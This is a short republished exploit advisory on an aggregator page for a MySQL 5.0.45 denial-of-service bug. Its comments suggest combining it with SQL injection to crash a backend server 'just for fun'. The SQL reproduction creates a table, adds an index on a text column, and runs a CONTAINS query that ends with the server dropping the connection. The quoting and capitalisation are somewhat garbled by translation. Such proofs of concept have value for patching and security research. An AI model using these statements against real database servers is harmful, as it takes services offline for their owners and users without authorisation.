Mysql 5.0.45 (modified) DoS Vulnerability

Source: Internet
Author: User

Mysql 5.0.45 (modified) DoS Vulnerability
/*
* MySQL <= 6.0 possibly affected
* Kristian Erik Hermansen
* Credit: Joe Gallo
* You must have Alter permissions to exploit this bug!
* Scenario: You found SQL injection, but you want to punch backend server
* In the nuts just for fun. Start with the Alter TABLE statement on
* A table and field you know to exist. The first two SQL statements are
* Simply to demostrate reproducibility...
*/

<Snip>
Mysql> Create TABLE 'test '(
'Id' int (10) unsigned not null AUTO_INCREMENT primary key,
'Foo' text NOT NULL
) ENGINE = InnoDB default charset = latin1;
Query OK, 0 rows affected

Mysql> Select * FROM test Where CONTAINS (foo, ''bar '');
Empty set

Mysql> Alter TABLE test add index (foo (100 ));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0

Mysql> Select * FROM test Where CONTAINS (foo, ''bar '');
ERROR 2013: Lost connection to MySQL server during query
</Snip>

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.